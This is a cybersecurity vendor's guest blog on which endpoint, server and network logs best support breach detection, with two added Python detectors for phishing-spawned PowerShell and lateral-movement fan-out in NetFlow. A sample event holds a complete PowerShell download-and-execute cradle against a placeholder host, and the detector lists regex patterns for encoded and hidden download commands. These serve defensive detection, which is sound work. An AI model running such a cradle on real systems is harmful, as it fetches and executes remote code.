Raytheon Guest Blog: Ensuring your Organization's Cybersecurity is Protected
Let’s be real: almost no one could have detected, or did detect, that the SolarWinds software had been modified to do malicious things and provide entry points into an organization’s network. As with most breaches, the earlier you can detect it the better. If organizations can’t outright prevent it, then their only recourse is detection.
The question becomes, “What is needed for detection?” Visibility is key. In the security world, everyone talks about log collection. The default has been to collect all the logs from everywhere and keep them for as long as possible. The reality is that this isn’t needed.
Through our work as a Managed Detection and Response/Managed Security Service Provider, we believe that targeting the most useful logs is key to detection. How do we know a log is useful? We tie it to a use case that is a well-known “Tactic, Technique and Procedure” (TTP) of the adversary most likely to attack your org. Performing a threat assessment and then tying the threat back to the MITRE ATT&CK framework is a great place to start. Our experience has shown that the following types of log sources are best suited for detection and apply to the most widespread use cases.
Endpoint Logs: Whether it’s an Endpoint Detection and Response tool or something like Sysmon, knowing what is going on at an endpoint is critical in terms of early detection. If a user clicks on a link from a phishing email that downloads a file that then runs a PowerShell command, the ability to collect and alert on that type of activity could be the difference between a company being compromised or not.
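As an added illustration of the phishing chain above (not code from the blog or from Raytheon), the following detector runs over constructed Sysmon Event ID 1 process-creation records and flags a user-facing application (Office app, mail client, browser) spawning a script host such as PowerShell, scoring the command line for the download-cradle patterns that such a chain typically leaves behind. The parent/child lists, the patterns and the sample events are all assumptions a team would tune to its own environment.

```python
"""Detection over constructed Sysmon Event ID 1 (process creation) records.

Added example: flags a user-facing app spawning a script host, then scores the
command line for download-cradle indicators. Lists and patterns are assumptions.
"""
import re
from dataclasses import dataclass

# Parents a phishing lure typically runs under (assumed list; extend for your estate).
LURE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Script hosts whose appearance under those parents is worth an alert on its own.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line patterns commonly seen in PowerShell download cradles (assumed set).
CRADLE_PATTERNS = [
    ("encoded_command", re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s")),
    ("download_string", re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b")),
    ("invoke_expression", re.compile(r"(?i)\biex\b|invoke-expression")),
    ("bypass_policy", re.compile(r"(?i)-(ep|executionpolicy)\s+bypass")),
    ("hidden_window", re.compile(r"(?i)-w(indowstyle)?\s+hidden")),
]


@dataclass
class Finding:
    utc_time: str
    user: str
    parent: str
    image: str
    indicators: list
    severity: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(event: dict):
    """Return a Finding for a lure-parent -> script-host event, else None."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    if parent not in LURE_PARENTS or image not in SCRIPT_HOSTS:
        return None
    indicators = [name for name, rx in CRADLE_PATTERNS if rx.search(event["CommandLine"])]
    # The parent/child pair alone is medium; cradle indicators raise it to high.
    severity = "high" if indicators else "medium"
    return Finding(event["UtcTime"], event["User"], parent, image, indicators, severity)


def run_detection(events):
    """Apply analyse() to every event, keeping only the findings."""
    return [f for f in (analyse(e) for e in events) if f is not None]


# Constructed sample events shaped like Sysmon Event ID 1 fields (not real telemetry).
SAMPLE_EVENTS = [
    {"UtcTime": "2024-03-01 09:14:02", "User": "CORP\\jdoe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/update.ps1')\""},
    {"UtcTime": "2024-03-01 09:15:10", "User": "CORP\\jdoe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"},
    {"UtcTime": "2024-03-01 09:16:33", "User": "CORP\\asmith",
     "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"UtcTime": "2024-03-01 09:16:34", "User": "CORP\\asmith",
     "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "CommandLine": "chrome.exe --type=renderer"},
]

if __name__ == "__main__":
    for finding in run_detection(SAMPLE_EVENTS):
        print(finding)
```

Run against the sample set, the Word-to-PowerShell event comes out high with four indicators, the Chrome-to-PowerShell event comes out medium with none, and the Explorer-launched script and the Chrome renderer child are ignored, which is the point of keying on the parent/child pair before looking at the command line.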
For critical systems and servers like AD servers, application servers, or even file servers that store an organization’s critical data, you will want to collect the application, operating system event, and security logs.
Network logs: Network logs are an important set of logs to collect. A sophisticated adversary may tamper with (delete, overwrite, modify) the logs at the endpoint. Network logs can help fill in the blanks of what activity happened. Typically, network-based logs are harder to tamper with, so their veracity is higher. NetFlow, firewall and proxy logs are great evidence to collect and provide insights that aren’t available at the endpoints. If an organization has a large network with multiple locations or WAN connections, then capturing intra-network traffic can be very useful in helping to detect lateral movement. If the organization can afford it, capturing network packets (PCAP) is the gold standard for network forensics. However, because this makes a copy of every packet on the network, organizations are usually limited in how long the data can be captured and stored.
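To show what the intra-network lateral-movement use case above looks like in practice, here is an added example (not the blog's or Raytheon's code) that reads constructed NetFlow-style records and raises an alert when one internal host connects to many distinct internal hosts on administrative ports within a sliding time window. The record format, the internal ranges, the port list, the allowlisted scanner and the thresholds are assumptions to be tuned for a real network.

```python
"""Fan-out detection over constructed NetFlow-style records.

Added example: an internal source reaching >= THRESHOLD distinct internal
destinations on admin ports inside a sliding WINDOW is flagged. All values
below (ranges, ports, allowlist, thresholds, flows) are assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

INTERNAL = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
ADMIN_PORTS = {22, 135, 445, 3389, 5985, 5986}   # SSH, RPC, SMB, RDP, WinRM (assumed)
ALLOWLIST = {"10.0.0.5"}                          # assumed vulnerability scanner
WINDOW = timedelta(minutes=10)
THRESHOLD = 5


def is_internal(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL)


def parse_flow(line: str) -> dict:
    """Constructed export format: ts,src,dst,dport,proto,bytes (one flow per line)."""
    ts, src, dst, dport, proto, nbytes = line.split(",")
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
            "dport": int(dport), "proto": proto, "bytes": int(nbytes)}


def load_flows(text: str) -> list:
    return [parse_flow(l) for l in text.splitlines() if l.strip()]


def detect_fanout(flows, window=WINDOW, threshold=THRESHOLD) -> dict:
    """Return {src: alert} for sources whose distinct admin-port targets hit the threshold."""
    recent = defaultdict(deque)  # src -> deque of (ts, dst) inside the window
    alerts = {}
    for f in sorted(flows, key=lambda x: x["ts"]):
        if (f["src"] in ALLOWLIST or f["dport"] not in ADMIN_PORTS
                or not (is_internal(f["src"]) and is_internal(f["dst"]))):
            continue
        q = recent[f["src"]]
        q.append((f["ts"], f["dst"]))
        while q and f["ts"] - q[0][0] > window:   # slide the window forward
            q.popleft()
        targets = {dst for _, dst in q}
        if len(targets) >= threshold and f["src"] not in alerts:
            alerts[f["src"]] = {"first_seen": q[0][0], "last_seen": f["ts"],
                                "targets": sorted(targets)}
    return alerts


# Constructed flows: 10.1.2.30 sweeps five hosts in 3.5 min (alert); 10.1.2.31 talks to one
# file server (no alert); 10.1.2.32 fans out on 443 (not an admin port); 10.1.2.33 touches
# five hosts but 12 min apart (window never fills); 10.0.0.5 is the allowlisted scanner;
# 203.0.113.7 is external and out of scope for this intra-network rule.
SAMPLE_FLOWS = """\
2024-03-01T09:00:00,10.1.2.30,10.1.2.40,445,tcp,5120
2024-03-01T09:00:40,10.1.2.30,10.1.2.41,445,tcp,4800
2024-03-01T09:01:10,10.1.2.30,10.1.2.42,445,tcp,5012
2024-03-01T09:02:05,10.1.2.30,10.1.2.43,3389,tcp,90112
2024-03-01T09:03:30,10.1.2.30,10.1.2.44,445,tcp,4700
2024-03-01T09:00:05,10.1.2.31,10.1.2.40,445,tcp,1200000
2024-03-01T09:01:05,10.1.2.31,10.1.2.40,445,tcp,800000
2024-03-01T09:00:10,10.1.2.32,10.1.2.50,443,tcp,3000
2024-03-01T09:00:11,10.1.2.32,10.1.2.51,443,tcp,3000
2024-03-01T09:00:12,10.1.2.32,10.1.2.52,443,tcp,3000
2024-03-01T09:00:13,10.1.2.32,10.1.2.53,443,tcp,3000
2024-03-01T09:00:14,10.1.2.32,10.1.2.54,443,tcp,3000
2024-03-01T09:00:00,10.1.2.33,10.1.2.60,445,tcp,2000
2024-03-01T09:12:00,10.1.2.33,10.1.2.61,445,tcp,2000
2024-03-01T09:24:00,10.1.2.33,10.1.2.62,445,tcp,2000
2024-03-01T09:36:00,10.1.2.33,10.1.2.63,445,tcp,2000
2024-03-01T09:48:00,10.1.2.33,10.1.2.64,445,tcp,2000
2024-03-01T09:05:00,10.0.0.5,10.1.2.40,445,tcp,300
2024-03-01T09:05:01,10.0.0.5,10.1.2.41,445,tcp,300
2024-03-01T09:05:02,10.0.0.5,10.1.2.42,445,tcp,300
2024-03-01T09:05:03,10.0.0.5,10.1.2.43,445,tcp,300
2024-03-01T09:05:04,10.0.0.5,10.1.2.44,445,tcp,300
2024-03-01T09:06:00,203.0.113.7,10.1.2.40,445,tcp,300
"""

if __name__ == "__main__":
    for src, alert in detect_fanout(load_flows(SAMPLE_FLOWS)).items():
        print(src, alert)
```

The sliding window matters more than the raw count: 10.1.2.33 reaches the same number of hosts as 10.1.2.30, but spread over 48 minutes, so it never holds five distinct targets at once and stays quiet, while the allowlist keeps the scanner from paging the on-call analyst every night. Because this rule only looks at who talked to whom and on which port, it works on NetFlow even where the endpoint logs have been wiped.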
Outsourcing cyber services may be the best strategy for providing a competitive advantage to optimize enterprise cyber security. Raytheon Intelligence & Space has more than a decade of experience as an MDR/MSSP provider helping protect commercial and government customers against all manner of cyber threats. As part of RI&S’ service delivery we provide the top 10-12 log/data sources critical to enabling our service. Our advanced analytics platform, coupled with highly skilled threat analysts, leverages the most useful data to detect, inform and protect organizations large and small.
Raytheon Cyber Services